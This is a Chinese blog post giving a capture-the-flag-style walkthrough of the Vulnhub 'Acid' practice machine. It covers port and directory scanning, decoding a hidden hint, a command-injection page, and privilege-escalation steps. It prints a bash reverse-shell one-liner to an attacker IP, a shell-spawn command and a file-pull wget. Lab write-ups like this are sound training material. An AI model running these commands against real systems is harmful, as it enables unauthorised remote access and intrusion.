Vulnhub-Acid

最新推荐文章于 2024-09-19 09:35:27 发布
最新推荐文章于 2024-09-19 09:35:27 发布
阅读量58 收藏
点赞数
分类专栏: 漏洞复现 文章标签: 前端 安全 html
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_45155797/article/details/130003640
版权

Acid

1.信息收集

nmap -sP 192.168.14.0/24
nmap -p- -sV 192.168.14.187


F12看源码,发现html最后有一行奇怪的编码

0x643239334c6d70775a773d3d

得到了wow.jpg的提示,url直接访问没有发现

dirb http://192.168.14.187:33447




37:61:65:65:30:66:36:64:35:38:38:65:64:39:39:30:35:65:65:33:37:66:31:36:61:37:63:36:31:30:64:34


7aee0f6d588ed9905ee37f16a7c610d4



扫描5个目录cake.php, error.php, hacked.php, index.php, include.php

http://192.168.14.187:33447/Challenge/MagicBox/command.php访问后发现存在命令执行漏洞

2.漏洞利用

bash -c "bash -i >& /dev/tcp/192.168.14.183/4444 0>&1"



3.提权

find / -user acid 2>/dev/null


python3 -m http.server 1111
wget http://192.168.14.187:1111/hint.pcapng



python -c 'import pty;pty.spawn("/bin/bash")'



Wh1teSu
关注
专栏目录
渗透靶场——Vulnhub:Acid
tlovejr的博客
09-17 313
1、首先还是常规套路,kali攻击机器还有靶机均为net模式,然后扫描主机 2、找到存活靶机ip地址,然后我们继续开始信息收集 nmap -T4 -p- 192.168.40.130 3、访问8080端口没有结果,那么我们继续访问一下33447这个端口试一下 4、成功发现我们要继续做的这个界面,继续信息收集,目录扫描,但是并没有发现有用的信息 5、然后我们继续尝试一下robots.txt 6、发现也没有什么有用的信息,那么我们查看一下源码,看看有没有什么有用的信息 7、在查看源码的时候发现有一个有
Vulnhubacid靶机渗透流程
weixin_44255856的博客
08-03 1041
1,检查靶机主机是否存活。 2,检查靶机开放的端口并对端口进行识别 发现33447端口存活(存在web服务) 由于只存在web服务和apache服务,所以只能从web服务和apache服务下手。 3,首先直接御剑一把梭 大概看了下,先放在这里。 F12查看网页源码,发现存在注释。 0x643239334c6d70775a773d3d16进制转换为字符串d293LmpwZw==,最终解码出来...
vulnhub-ACID
weixin_50683638的博客
12-09 2252
靶机:acid(https://download.vulnhub.com/acid/Acid.rar)网络模式:nat 扫描主机 扫描端口33447/tcp,Apache2.4.10 ####### 目录扫描 浏览网站,查看源码底下看到一串十六进制编码 先ascii转换,在base64转码得到 wow.jpg 访问wow.jpg报错404想到上面我们扫描目录images 将图片保存,记事本打开,发现一串数字 先ascii转码,在MD5转换得到63425 但暂时并没有什么账号或者需要登陆
vulnhub靶场,-Acid
kukudeshuo的博客
08-02 474
vulnhub靶场,-Acid 环境准备 靶机下载地址:https://www.vulnhub.com/entry/acid-server,125/ 攻击机:kali(192.168.109.128) 靶机:-Acid(192.168.109.149) 下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境,启动即可,将网段设置为NAT模式 信息收集 使用arp-scan确定目标靶机 确定目标靶机IP为192.168.109.149 使用nmap扫描查看目标靶机端口开放情况
Vulnhub-Acid 靶机练习
qq_43232893的博客
11-25 470
Vulnhub-Acid靶机练习准备主机发现端口扫描访问33447端口开启的页面发现/Challenge/include.php页面存在文件包含漏洞/Challenge/hacked.php页面也没有什么漏洞利用在/Challenge/cake.php路径发现了一个/Magic_Box文件夹发现command.php页面开放了ping功能通过命令注入拿shell提权 准备 kali攻击机IP:192.168.255.139 靶机IP:192.168.255.145 主机发现 nmap -sP 192.168
vulnhub-Acid靶机笔记
Maturey_的博客
05-21 89
vulnhub-Acid
VulnHub渗透测试实战靶场 - ACID: SERVER
LYJ20010728的博客
08-05 876
VulnHub渗透测试实战靶场 - ACID: SERVER环境下载ACID: SERVER靶机搭建渗透测试信息收集漏洞挖掘getshell提权 环境下载 戳此进行环境下载 ACID: SERVER靶机搭建 将下载好的靶机环境,导入VMware,将其网络适配设置为NAT模式,运行即可 渗透测试 信息收集 使用Kali自带的工具netdiscover进行子网探测:sudo netdiscover -r 192.168.246.0/24 用Nmap对获取到的靶机IP地址进行扫描:sudo n
VulnHub打靶の-Acid
壊壊的诱惑你的博客
10-12 1176
靶机地址:https://download.vulnhub.com/acid/Acid.rar 首先nmap -sP 或netdiscover -r来找靶机的IP,此为192.168.1.171 nmap -sV -p- 192.168.1.171扫描靶机的全部端口的服务版本: root@Kali-X86:~# nmap -sV -p- 192.168.1.171 Starting Nmap...
VulnhubAcid实战
weixin_43862283的博客
04-29 391
1、发现主机 使用nmap对内网进行扫描,发现主机 nmap -sP 192.168.340/24 2、扫描端口 用nmap扫描目标主机,发现只有33447端口开启,http端口 nmap -sV -p0-65535 192.168.34.151 3、扫描网站目录并进行爆破 dirb http://192.168.34.151:33447 发现Challenge目录,进行目录爆破 访...
Net-class-hand-acid-acid:paddlehub ocr实践
05-08
Net-class-hand-acid-acid paddlehub ocr实践 网课手酸酸,眼花花,救星来啦! paddlehubocr实践 网课看完笔油见底,两手酸酸,头皮麻麻,本子满满密密麻麻。 你还在为网课抄不完的笔记烦恼嘛? 你还在为网课那弄不...
crackme-1-Acid_burn.zip
07-19
crackme-01
商业源码-编程源码-acid v1.4.4.zip
06-14
《商业源码-编程源码-acid v1.4.4》 在IT行业中,源码是软件开发的核心,它代表了程序的原始指令集合,是程序员思想的直接体现。"acid v1.4.4"是一个商业源码项目,这通常意味着它是面向企业级应用的,可能涉及到...
-webkit-box-reflect属性与倒影效果的实现
读心悦
09-13 536
是一个非标准的 CSS 属性,主要用于在 WebKit 浏览器(如 Chrome 和 Safari)中创建元素的倒影效果。这个属性并不是 CSS 规范的一部分,但在实践中经常被用来实现简单而有趣的视觉效果。
Vue使用query传参Boolean类型,刷新之后转换为String问题
q879936814的博客
09-12 546
要解决这个问题,不能直接Boolean处理,因为如果传入false,那么转换成字符串,Boolean(‘false’)会变成true;做项目时发现第一次进入页面时传参是正常的Boolean类型,刷新之后变成了String,这是浏览器进行的一次强制转换;解决方法:使用JSON.parse处理参数。
测试ASP.NET Core的WebApi项目调用WebService
gc_2299的博客
09-15 482
记录在WebApi中调用WebService的基本方式。
计算机毕业设计 基于SpringBoot的课程教学平台的设计与实现 Java+SpringBoot+Vue 前后端分离 文档报告 代码讲解 安装调试
weixin_19164791635
09-12 1023
本文介绍了一款基于Java、SpringBoot和Vue.js技术的课程教学平台。该平台服务于管理员、学生和教师,提供教学资源管理、课程信息浏览、作业提交与批改等功能,旨在优化教学流程,提升教育质量,促进教育资源的数字化共享,推动教育信息化发展。
(微服务项目)新闻头条——Day1
weixin_73253843的博客
09-13 1212
(微服务项目)新闻头条——Day1
前端vue-父传子
最新发布
weixin_46969393的博客
09-19 548
父传子的话是在components中创建一个子组件MyTest.vue,并且在父组件中先导入(import MyTest from "./components/MyTest"),再注册(在expo二default中写上 compnents:{MyTest}),再使用标签(<MyTest>< / MyTest>),子组件要接收,在子组件的export default中(props:['obj']),在子组件中使用obj.goodsList数组中的字段就可以了(obj.id或者obj.name或者obj.pr
simulink中lead-acid模块
12-27
Lead-acid模块是Simulink中用于建模铅酸电池的工具。铅酸电池是一种常见的蓄电池,广泛应用于汽车、卡车以及太阳能储能系统等领域。 Simulink中的Lead-acid模块可以帮助用户建立铅酸电池的数学模型,用于模拟和分析...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Wh1teSu

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值